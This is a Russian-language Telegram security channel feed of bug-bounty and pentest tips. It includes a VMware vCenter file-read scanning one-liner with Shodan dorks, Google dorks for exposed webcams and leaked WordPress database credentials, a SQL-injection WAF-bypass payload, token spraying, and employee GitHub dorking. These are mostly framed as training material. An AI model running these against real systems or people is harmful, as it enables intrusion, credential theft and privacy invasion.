White Hat
11.8K subscribers
952 photos
51 videos
16 files
1.03K links
Пишем про информационную безопасность и белый хакинг.

Сотрудничество: @workhouse_price

Канал на бирже: https://telega.in/c/kind_hack

Канал в реестре РКН: https://clck.ru/3FtTnR
Download Telegram
🫢 Инструменты для хакинга на Kali Linux

В этой статье мы рассмотрим 20 лучших инструментов для хакинга на Kali Linux. Это подборка средств для аудита и взлома беспроводных сетей, проверки уязвимостей и разведки.

💬 Ссылка на чтиво

#tools #kali
Please open Telegram to view this post
VIEW IN TELEGRAM
👍72
🇪🇺 Списки слов для фаззинга сайтов на разных языках

При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков:

💬 Infosec Wordlists
💬 Dirbuster Spanish
💬 Bip Spanish
💬 Türkçe Wordlist
💬 krypt0n wordlists
💬 Combined-Wordlists
💬 Common Web Managers Fuzz Wordlists
💬 Cracking French passwords

#fuzz #wordlist
Please open Telegram to view this post
VIEW IN TELEGRAM
👍62👏1
🗂 Коллекция видео по эксплуатации уязвимостей веб-приложений

Представленный ниже репозиторий содержит подборку видео по тестированию веб-приложений на различные уязвимости. Для удобства, содержимое разбито на категории, в зависимости от типа атак и уязвимостей.

💬 Ссылка на GitHub

#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
🟦 LFI, SSRF и XSS в VMware vCenter

В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.

Для поиска уязвимых хостов можно использовать однострочник:

cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

Дорк, который можно использовать для поиска в Shodan:

http.title:"ID_VC_Welcome"

Для поиска в Zoomeye:

app:"VMware vCenter"

#LFI #SSRF #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31👏1🤔1
🔬 Поиск внутренних служб в файлах JavaScript

Если вы нашли SSRF, но не смогли получить доступ к внутренним веб-службам, всегда стоит заглянуть в файлы JavaScript, в частности в main.js или app.js.

Осмотрите содержимое этих файлов по ключевым словам localhost, 127.0.0.1, host, port, и т.д., и вы можете найти скрытые внутренние ресурсы, к которым можно получить доступ через SSRF.

#SSRF #JS
👍4🥰1
🔵 Нарушение процесса регистрации пользователя приложения за 10 минут

Обход регистрации, захват аккаунта любого пользователя и выполнение действий от его имени с помощью изменений в своем личном кабинете.

💬 Ссылка на чтиво

#ATO
Please open Telegram to view this post
VIEW IN TELEGRAM
📚 Небольшая подборка онлайн лаб от Hackxpert

Ниже представлена подборка лабораторий для практики поиска различных уязвимостей:

💬 Reflected XSS
💬 Stored XSS
💬 JWT
💬 RFI
💬 LFI
💬 Обход Captcha
💬 Обход панели входа админа
💬 Open redirects

#web #lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👎94🤔1
✈️ Поиск открытых веб-камер

Ниже представлена небольшая подборка Google дорков для поиска открытых веб-камер:

allintitle: "Network Camera NetworkCamera"

intitle:"EvoCam" inurl:"webcam.html"

intitle:"Live View / - AXIS"

intitle:"LiveView / - AXIS" | inurl:view/view.shtml

intitle:"Live View / - AXIS" | inurl:/mjpg/video.mjpg?timestamp

inurl:axis-cgi/jpg

inurl:"MultiCameraFrame?Mode=Motion"

inurl:/view.shtml

inurl:/view/index.shtml

"my webcamXP server!"

#Dorking
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16
💬 Чего следует избегать при работе на WordPress!

1.- Оставлять настройки по умолчанию.
2.- Допускать отсутствия контроля над публичным контентом и политиками.

Скрин ниже тому подтверждение. Найти подобные хосты можно с помощью Google дорка:

"define('DB_USER'," "define('DB_PASSWORD'," ext:txt

#WP
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10💘1
🔑 Определяем принадлежность найденных ключей и токенов

При пентесте сайтов мы зачастую ищем утечки в различных местах, включая GitHub, JS-файлы, HTTP-ответы, исходные коды и других местах.

В результате, находится множество ключей и токенов. Если мы знаем к чему относится ключ, то можем поискать способы его эксплуатации в репозитории KeyHacks.

Однако, бывают случаи, когда мы не знаем действительны ли найденные токены / ключи или к какой службе они принадлежат? Одним из способов определить это является атака Token Spray.

По сути, в этой атаке мы берём найденный токен и пытаемся использовать его во всех подряд общеизвестных службах. Если где то сработает, то мы соответственно узнаем принадлежность этого ключа.

Но так как вручную делать это долго и не интересно, мы можем использовать новые шаблоны в Nuclei (не забудьте обновиться). Для их использования достаточно выполнить:

nuclei -t ~/nuclei-templates/token-spray -var token=XXX_TOKEN_XXX

Или сохраните все токены в файл и выполните:

nuclei -t ~/nuclei-templates/token-spray -var token=token_list.txt

#Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
😡 Секретная методология GitHub доркинга

1. Что вы делаете в первую очередь, когда выполняете GitHub Dorking? Вы находите страницу своей цели на Github.

2. В 50% случаев не найдете утечек на их главной странице GitHub, но есть ли другие страницы, на которых можно попробовать найти что-то?

Ответ - Да! Если вы перейдёте на GitHub своей цели и прокрутите вниз, то увидите вкладку «People». Это сотрудники, которые официально работают с вашей целью.

3. Теперь из вкладки «People» перейдите на страницу любого сотрудника. Всех сотрудников, упомянутых на вкладке «People» также можно проверить с помощью дорков Github для поиска конфиденциальной информации, относящейся к нашей цели. Таким образом, наша поверхность атаки становится значительно выше.

Однако помните, что у этих сотрудников есть иная деятельность, нежели работа на исследуемую вами компанию, а это значит, что некоторые конфиденциальные утечки могут относиться к другим проектам, а не к вашей цели.

4. Иногда вы не можете найти утечки по сотрудникам на вкладке «People», не волнуйтесь, есть еще кое-что, что поможет вам увеличить поверхность атаки!

Пробуем найти сотрудников извне. Например, с помощью дорка в гугл:

site:linkedin.com intext:"software engineer at название_компании"

Искать можно не только на LinkedIn. Думаю вы поняли основной принцип. Так вы найдете сотрудников, которые работают на вашу целевую компанию, но все еще не указаны на вкладке «People». Почему?

Может быть, потому что они должны храниться в секрете, и они публикуют конфиденциальные материалы... Никогда не угадаешь.

Теперь, когда вы нашли еще несколько сотрудников, нужно найти их страницы на Github. Обычно у всех разработчиков программного обеспечения есть страница на GitHub.

Чтобы найти ее, посмотрите в описание профиля или используйте этот гугл-дорк:

site:github.com intext:тут_ник_сотрудника

Или просто напишите в поиске:

github тут_ник_сотрудника

#GitHub #Dork
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥2
🔎Скрипты и дорки для Netlas

Разработчики Netlas (аналог Shodan) представили статью, в которой рассказывают об автоматизации поиска хостов с помощью своей консольной утилиты. Скрипты из статьи доступны на GitHub.

Кроме того, нам любезно предоставили большую подборку дорков, ознакомиться с которой вы можете по данной ссылке.

💬 Ссылка на статью
💬 Ссылка на скрипты
💬 Ссылка на дорки

#Dork
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4👏1
📌 Автоматизация JavaScript-разведки | Привет, друг. На связи Эллиот.

Основные этапы JavaScript-разведки в Bug Bounty это:

1 - Сбор файлов JS от цели.
2 - Поиск конечных точек из файлов JS.
3 - Поиск секретов в файлах JS.
4 - Получение файлов JS локально для ручного анализа.
7 - Извлечение имен переменных из файлов JS для проверки на XSS.
8 - Сканировать файлов JS на наличие DomXSS.

Для автоматизация вышеперечисленных и некоторых других действий есть неплохой инструмент, под названием JSFScan. Достаточно передать ему список поддоменов и задать опции в соответствии с вашими предпочтениями.

Ниже представлено видео, демонстрирующее процесс работы с данным инструментом.

Ссылка на GitHub
Ссылка на видео

#Web #JS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
🗄 Вариант поиска уязвимостей при пассивном анализе

Одним из шагов, которые я предпринимаю при исследовании нового домена, является получение целевых конечных точек и URL-адресов, выявленных третьими сторонами. Это можно сделать с помощью инструментов с открытым исходным кодом, таких как gau.

Инструмент getallurls (gau) извлекает известные URL-адреса из AlienVault's Open Threat Exchange, Wayback Machine и Common Crawl для любого заданного домена. Выполняем команду:

printf site.com | gau

После этого начинаем вручную анализировать конечные точки и URL-адреса, уделяя особое внимание некоторым чувствительным ключевым словам:

invoice, discount, promo-code, join, redirect, reset_password, reset-password, password, TrackOrder, token, invite.

В примере на фото ниже привлекает внимание слово invite. После нажатия по данной ссылке открывается страница регистрации. После создания новой учетной записи с личной электронной почтой (@gmail.com) сайт просто перенаправляет на страницу компании внутри целевого приложения, содержащую всех приглашенных сотрудников и конфиденциальную информацию.

#Web #Leak
👍3
📃 Механизмы закрепления в Windows системах

Репозиторий, представленный ниже, содержит информацию о механизмах закрепления в системах Windows. Большая часть из них хорошо известна в течение многих лет и активно используется в различных сценариях.

Репозиторий появился недавно и автор обещает активно пополнять его со временем.

💬 Ссылка на GitHub

#Windows
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👏21👍1
📑 Пассивный сбор URL адресов и ответов сервера

Любой, кто занимается Bug Bounty, скорее всего, использовал waybackurls. Этот инструмент получает URL-адреса с web.archive.org и дополнительные ссылки (если таковые имеются) из index.commoncrawl.org. Вы, вероятно, также использовали gau, который находит URL-адреса из Wayback архива, Common Crawl, а также из Alien Vault и URLScan.

Инструмент под название waymore также получает URL-адреса из всех этих источников. Но самое главное различие между waymore и другими инструментами заключается в том, что он может загружать из архива ещё и ответы от сервера на эти URL-адреса из Wayback Machine, чтобы затем искать еще больше ссылок, комментариев разработчиков, дополнительных параметров и т.д.

Вы можете поближе познакомиться с инструментом на его GitHub странице. Можно также заглянуть в видео по ссылке, где показан пример его работы и использование другой утилиты от этого автора, под названием xnLinkFinder, для поиска URL адресов уже в собранных ответах сервера.

P.S.

Кстати, кроме xnLinkFinder можно ещё заюзать trufflehog для поиска секретов:

trufflehog filesystem --directory=/results/domain.com

#Recon
👍3🔥1
💉 Совет по обходу WAF для SQL-инъекций

Если вы пытаетесь выполнить SQL инъекцию и ее блокирует WAF, попробуйте использовать особенности Е-нотации в синтаксисе SQL. Таким образом, вы можете обфусцировать свой запрос и оказаться вне поля зрения WAF.

https://example.com/getUser?name=' or "=' (403 Forbidden)

https://example.com/getUser?name=' or 1337.e(")=' (200 OK)

#Web #WAF #SQLi
👍132🤔1
🔎 Поиск по облачным «хранилищам»

Сегодня предлагаю вам рассмотреть сервис, который осуществляет поиск по таким хранилищам как: Mega, Depositefiles, Dropbox, Turbo Bit, Vip-files и пр. Возможен поиск по 60 наиболее популярным облачным хранилищам.

Ссылка на инструмент

Если вам необходимо осуществить поиск по менее популярным хранилищам, типа Take File, Anonfiles, Keep2share, Ex-load и пр., то предлагаю рассмотреть другой сервис, который осуществляет поиск по более чем 100 различным ресурсам.

Ссылка на инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍51🔥1
Недавно выпустили плагин BurpSuite, который использует технологии искусственного интеллекта

Плагин генерирует имена для директорий, параметров и возможных файлов на основе запросов. Для генерации BruteForce листа используется OpenAI. Насколько это эффективно предстоит ещё проверить, но в целом — когда идей больше нет, можно обратиться к ней, чтобы получить "креатива".

На скрине показан пример как нейросеть может описать параметры, для отдельно взятого запроса и результат получается довольно достойным.

Ссылка на GitHub

#BurpSuite
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Практическая платформа для новичков Bug bounty

Бесплатный набор практических заданий от TheXSSRat, которые будут полезны новичкам и помогут вам проверить свои навыки в поиске и эксплуатации распространённых в Bug Bounty уязвимостей, таких как IDOR, XSS, CSRF и логические уязвимости.

Автор также обещает пополнения текущего списка заданий.

Ссылка на платформу

#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Используем скрытый функционал в свойствах документов Microsoft Office для получения реверс шелла | Привет, друг. На связи Эллиот

Макросы из офисных документов Windows активно используются злоумышленниками или исследователями безопасности для доставки полезной нагрузки на сервер и компрометации системы.

В статье по ссылке представлен рабочий метод создания макроса для документов Word и Excel и его использование для вызова другого объекта, расположенного в свойствах документа. В видео ниже продемонстрировано получение реверс шелла с помощью этого метода.

Ссылка на чтиво
Ссылка на видеоматериал

#Word #Excel #Windows
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4